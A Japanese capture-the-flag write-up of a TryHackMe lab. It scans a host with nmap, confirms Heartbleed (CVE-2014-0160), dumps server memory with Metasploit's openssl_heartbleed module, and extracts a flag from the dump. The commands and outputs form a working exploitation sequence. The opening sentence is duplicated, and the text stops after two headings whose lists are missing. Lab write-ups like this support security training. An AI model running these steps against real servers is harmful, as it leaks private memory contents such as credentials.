
このプロジェクトの目的は、リモートホストに対してHeartbleed脆弱性(CVE-2014-0160)の評価、その存在の確認、そしてTLSプロトコルを介してサーバーメモリから潜在的に機密性の高い情報を抽出するための悪用を行うことでした。
このプロジェクトの目的は、リモートホストのHeartbleed脆弱性(CVE-2014-0160)を評価し、その存在を確認し、TLSプロトコルを介してサーバーメモリから潜在的に機密性の高い情報を抽出するために悪用することでした。
オープンサービスの特定(Nmap)
nmap -sC -sV 52.215.184.158
結果:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
111/tcp open rpcbind 2-4
443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
TLS証明書は自己署名で期限切れでした。このことから、OpenSSLのバージョンが古い可能性が疑われました。ターゲットポート: 443。
Heartbleed脆弱性の確認(Nmapスクリプト)
nmap -p 443 --script ssl-heartbleed 52.215.184.158
結果:
| ssl-heartbleed:
| VULNERABLE:
| OpenSSL 1.0.1 is vulnerable to Heartbleed
| State: VULNERABLE
| Risk factor: High
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
ターゲットはHeartbleedに対して脆弱であることが確認されました。
悪用(Metasploit Framework)
msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 52.215.184.158
run
結果:
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
メモリのダンプに成功し、分析のためにローカルに保存されました。
メモリダンプの分析
strings openssl.heartble_152689.bin | grep -i "THM{"
結果:
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
アプリケーションフラグを含む機密データがTLSメモリから正常に抽出されました。これは、この脆弱性が実際に悪用されて機密情報が漏洩する可能性があることを確認しています。
リモートサーバー上でCVE-2014-0160を正常に特定し悪用しました。そのプロセスは以下の通りです:
公開されたシステムにHeartbleedが存在することは、重大なリスクをもたらします: